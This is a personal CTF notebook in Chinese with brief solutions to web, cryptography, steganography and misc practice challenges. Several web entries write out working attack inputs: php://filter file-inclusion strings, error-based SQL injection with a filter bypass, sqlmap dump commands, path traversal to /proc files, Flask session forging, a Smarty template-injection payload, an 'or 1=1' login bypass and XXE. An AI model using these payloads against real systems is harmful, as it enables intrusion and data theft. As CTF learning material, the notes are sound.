# CTF筆記

# **WEB-簽到題**

F12查看源代碼

# **密碼學(xué)-密碼學(xué)簽到題**

文本反轉(zhuǎn)

# **密碼學(xué)-郵件編碼**

Quoted-Printable解密http://www.metools.info/code/quotedprintable231.html

# **密碼學(xué)-Unicode編碼**

**Unicode解密**http://www.atoolbox.net/Tool.php?Id=670

# **隱寫-娃哈哈**

1、下載圖片

2、文本打開圖片拉到底端找到flag

# **密碼學(xué)-**風(fēng)中密語

百家姓解密http://www.atoolbox.net/Tool.php?Id=1050

# **密碼學(xué)-佛前頓悟**

與佛論禪加密http://www.atoolbox.net/Tool.php?Id=1027

# **密碼學(xué)-事不過三**

Base64解密三次https://tool.chinaz.com/tools/base64.aspx

# WEB-**文件包含**

教學(xué)文件中有

`file=php://filter/read=convert.base64-encode/resource=xxx.php`構(gòu)造語句

# 隱寫-猜一猜

百度百科宋茜英文名

# WEB-SQL盲注1

https://blog.csdn.net/qq_48511129/article/details/113180080?ydreferer=aHR0cHM6Ly9wYXNzcG9ydC5jc2RuLm5ldC9sb2dpbj9jb2RlPWFwcGxldHM%3D

1、改Header：index.php?file=php://filter/read=convert.[base64](https://so.csdn.net/so/search?q=base64&spm=1001.2101.3001.7020)-encode/resource=index.php

SQLmap

1、python [sqlmap.py](http://sqlmap.py/) -u"靶機(jī)URL" --current-db 查看數(shù)據(jù)庫名

2、python [sqlmap.py](http://sqlmap.py/) -u"靶機(jī)URL" -D note –tables 查看數(shù)據(jù)庫表

3、python [sqlmap.py](http://sqlmap.py/) -u"靶機(jī)URL" -D note -T fl4g –columns 查看表字段

4、python sqlmap.py -u"靶機(jī)URL” -D note -T f14g -C fllllag -dump 獲取字段值

# WEB-SQL盲注2

https://www.cnblogs.com/zhengna/p/15931584.html

Burp suit

POST情況下

1、嘗試獲取當(dāng)前數(shù)據(jù)庫的庫名

`name=xxx' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+&pass=xxx`

2、獲取表名

`name=xxx' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+&pass=xxx`

報(bào)錯(cuò)說明我們的sql語句被進(jìn)行了某種替換，導(dǎo)致語法錯(cuò)誤。嘗試雙寫繞過（不明白為啥第一次沒報(bào)錯(cuò)？）

`name=xxx' and updatexml(1,concat(0x7e,(selselectect group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+&pass=xxx`

3.獲取字段名

`name=xxx' and updatexml(1,concat(0x7e,(selselectect group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'),0x7e),1)--+&pass=xxx`

4、獲取flag

`name=xxx' and updatexml(1,concat(0x7e,(selselectect flag from fl4g),0x7e),1)--+&pass=xxx`

5、長度過長，使用Right()等字符串函數(shù)處理獲取Flag

# **WEB-任意文件讀取2**

https://blog.csdn.net/CyhDl666/article/details/114829646

1、構(gòu)造article?name=../../../proc/self/cwd/key.py查看key

2、使用flask_session_cookie_manager3加密key值

3、使用Burp Suit抓包Post，并修改Session值請(qǐng)求獲取Flag

# **WEB-簡單題**

https://blog.csdn.net/weixin_63957412/article/details/122952766

1、修改go.php為Index.PHP

2、在F12的監(jiān)控中查看Index.php的信息，或者使用Burp Suit抓包Index.PHP獲得Flag

# **WEB-找到FLAG**

https://blog.csdn.net/qq_54786552/article/details/118732644

https://blog.csdn.net/qq_53689523/article/details/128900366

1、構(gòu)造?file=php:*//filter/read=convert.base64-encode/resource=flag.php*

2、獲取key使用Base64解碼

https://tool.chinaz.com/tools/base64.aspx

3、獲得Flag

# **MISC-霧里看花**

1、下載ZIP解壓

2、使用010Editor查看解壓的word文件，發(fā)現(xiàn)文件頭是壓縮包

3、把word改成ZIP解壓

4、打開文件夾逐個(gè)文件用文本打開找Flag

# 隱寫-看圖找旗

1、010Editor打開發(fā)現(xiàn)圖片文件后有壓縮包

2、拿出來解壓得到TXT，Base64解碼獲得key：f{ysrolye_yoau_v_lge13c}

https://tool.chinaz.com/tools/base64.aspx

3、跳格子獲得flag

# **WEB-弱機(jī)網(wǎng)站**

https://blog.csdn.net/hivjianxian/article/details/127991459

關(guān)鍵詞：目錄穿透漏洞

1、URL直接訪問/img..

# **(藏寶題)MISC-偽加密**

https://blog.csdn.net/xiaozhaidada/article/details/124538768

關(guān)鍵詞：偽加密

1、下載壓縮包

2、用010editor打開后修改50 4B 03 04 14 00，50 4B 01 02 1F 00 14 00兩處后全局參數(shù)09 00至00 00

# **WEB-層層推進(jìn)**

1、F12查看源碼，有一個(gè)SO的html，無限往下點(diǎn)到404.tml，獲得Flag

# **隱寫-抽絲剝繭**

1、用010editor打開圖片，發(fā)現(xiàn)有一個(gè)圖片和一個(gè)壓縮包，刪掉圖片部分改后綴為zip

2、用文本打開原來的圖片部分，發(fā)現(xiàn)有key，用Unicode解密后獲得密碼

3、打開壓縮包獲得flag

# **隱寫-窮圖末路**

1、010打開圖片，發(fā)現(xiàn)后面有一串地址，從data:開始全部復(fù)制下來，瀏覽器輸入訪問

# **MISC-ROT13**

1、Base64解密

2、rot13解密

# **MISC-鍵盤鉤子hook**

聰明的自己翻譯

笨的（但直接方便，主要是還要看英文意思）：

1、打開vim編輯界面

2、根據(jù)指令操作一遍

# **(藏寶題) 秘密藏在我家的金庫里**

關(guān)鍵詞：二次注入

https://mp.weixin.qq.com/s/iHbj-En5xTcKf-NDyVLZbQ

1、通過dirsearchj進(jìn)行目錄爆破發(fā)現(xiàn)register.php

2、注冊(cè)賬號(hào)1232@qq.com;test;test登錄，用戶名顯示在登錄后的頁面上。

3、這樣這里有可能存在二次注入，當(dāng)我們注冊(cè)時(shí)，后臺(tái)的SQL語句大概類似于

Insert into users (email,username,password) VALUES ([1232@qq.com](mailto:1232@qq.com),test,test)

4、使用代碼爆破

# **(藏寶題) 名偵探很難**

1、直接輸入admin,password登入

2、F12修改cookie的normal_user為admin_user

# **隱寫-變形金剛**

1、下載圖片，使用010Editor打開發(fā)現(xiàn)高度有問題

2、修改高度為03 20，查看圖片下方出現(xiàn)二維碼

3、掃碼獲得Flag

# **密碼學(xué)-共模攻擊**

https://blog.csdn.net/shuaicenglou3032/article/details/117934550

關(guān)鍵詞：RSA原理 ****CommonModulus（英文都不會(huì)搜啊）****

1、看代碼找原理，找公因數(shù)

2、python寫反向代碼處理，不行可循環(huán)爆破

# **密碼學(xué)-未知文明的秘密**

# **web-前端加密**

1、控制臺(tái)直接運(yùn)行指定函數(shù)獲取密碼

2、通過密碼登入獲取Flag

# **MISC-攔截日志**

https://blog.csdn.net/zippo1234/article/details/109376357

https://ctftime.org/writeup/15211

# **(藏寶題)PPC編程-好玩的密鑰**

# **愛的信號(hào)（6月10日藏寶題）**

# **火星來電（CRYPTO2）**

關(guān)鍵詞：AAencode

1、AAencode解密

# **變形記（STEGA4）**

1、用010editor打開圖片，發(fā)現(xiàn)有一個(gè)圖片一個(gè)壓縮包，將文件分離

2、修改圖片高度看到壓縮包密碼

3、打開壓縮包獲取flag

# **郵件解密（STEGA2）**

1、010打開文件，發(fā)現(xiàn)文件頭是504b0304，binwalk分析后看到該文件就是個(gè)壓縮包

2、文件后綴改為zip，發(fā)現(xiàn)要密碼

3、文件尾是密碼解壓出pic.txt，data開始復(fù)制進(jìn)瀏覽器即可，二維碼掃出來就是flag

# **愛情甜如蜜（Web5）**

https://blog.csdn.net/qq_46263951/article/details/119703207

[https://blog.csdn.net/CyhDl666/article/details/114891629?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168555016116800192229598%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=168555016116800192229598&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-114891629-null-null.142^v88^insert_down1,239^v2^insert_chatgpt&utm_term=ctf the honey shop&spm=1018.2226.3001.4187](https://blog.csdn.net/CyhDl666/article/details/114891629?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168555016116800192229598%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=168555016116800192229598&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-114891629-null-null.142%5Ev88%5Einsert_down1,239%5Ev2%5Einsert_chatgpt&utm_term=ctf%20the%20honey%20shop&spm=1018.2226.3001.4187)

1、Burp suit抓包下載圖片，讀取構(gòu)造../../../../../../../proc/self/environ獲得SECRET_KEY=Nllt8SF3wxTkry3MDNYl0aGOtgJWu8YyvsakTKIc‘

2、通過flask-session-cookie-manager加密SECRET_KEY獲得Session：eyJiYWxhbmNlIjo5OTk5OX0.ZIg2Pw.C-n5B2COZMP0OD4z7qsabUTmf2o

3、F12修改網(wǎng)站Session余額變?yōu)?999，購買Flag商品獲得Flag

# **你說什么就是什么咯（Web1）**

https://blog.csdn.net/qq_53106085/article/details/120807244

關(guān)鍵詞：偽造XFF

1、抓包靶機(jī)

2、添加Referer: https://www.sgmw.com.cn/

# **障眼法（STEGA1）**

1、010editor打開圖片，看到有CRC報(bào)錯(cuò)，爆破CRC碼獲得初始寬高

2、修改高度獲得Flag

# **百密一疏（Web4）**

關(guān)鍵詞：XML外部實(shí)體攻擊，XML文件格式

本質(zhì)：把`php://filter/convert.base64-encode/resource=/../flag.txt通過XML傳輸獲取Flag`

1、構(gòu)造XML文件

[x16.xml](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/3ace1085-2780-40ce-8e95-5925934382d7/x16.xml)

2、上傳文件獲得key

3、Base64解碼

# **跳板機(jī)(Web6)**

https://blog.csdn.net/AAAAAAAAAAAA66/article/details/121490787?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165450595316781683923987%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=165450595316781683923987&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-2-121490787-null-null.142

# **蛛絲馬跡（Web3)**

1、Burp suit抓包get，在Response中獲得Flag

# **保護(hù)好你的API（Web02）**

關(guān)鍵詞：****SmartySSTi，SSTi****

https://www.freebuf.com/articles/web/264615.html

1、url+/xff

2、payload:X-Forwarded-For: {if var_dump(file_get_contents('/flag')) }{/if}

# **脆弱的網(wǎng)站**

https://zhuanlan.zhihu.com/p/78989602

# **我愛數(shù)學(xué)**

https://www.cnblogs.com/20175211lyz/p/11588219.html

# **我命由我不由天（中）**

https://blog.csdn.net/weixin_43272781/article/details/94380078

# 諜影重重

關(guān)鍵詞：萬能密碼，SQL注入

1、admin' or 1=1-- -

# 卷土重來

1、賬號(hào):admin，密碼:sgmwctf

2、SQLmap爆破add_to_Car獲得密碼sglmap -u "靶機(jī)URL/add_to_cart" —data “product id=1” --method POST --tables

# 一千次的執(zhí)著

（出題BUG，實(shí)際應(yīng)該編寫腳本請(qǐng)求1000次）

1、F12申請(qǐng)兩次發(fā)現(xiàn)cookie有個(gè)參數(shù)變成2

2、抓包c(diǎn)ookie有明顯的失敗請(qǐng)求參數(shù)，修改為1000發(fā)送請(qǐng)求返回Flag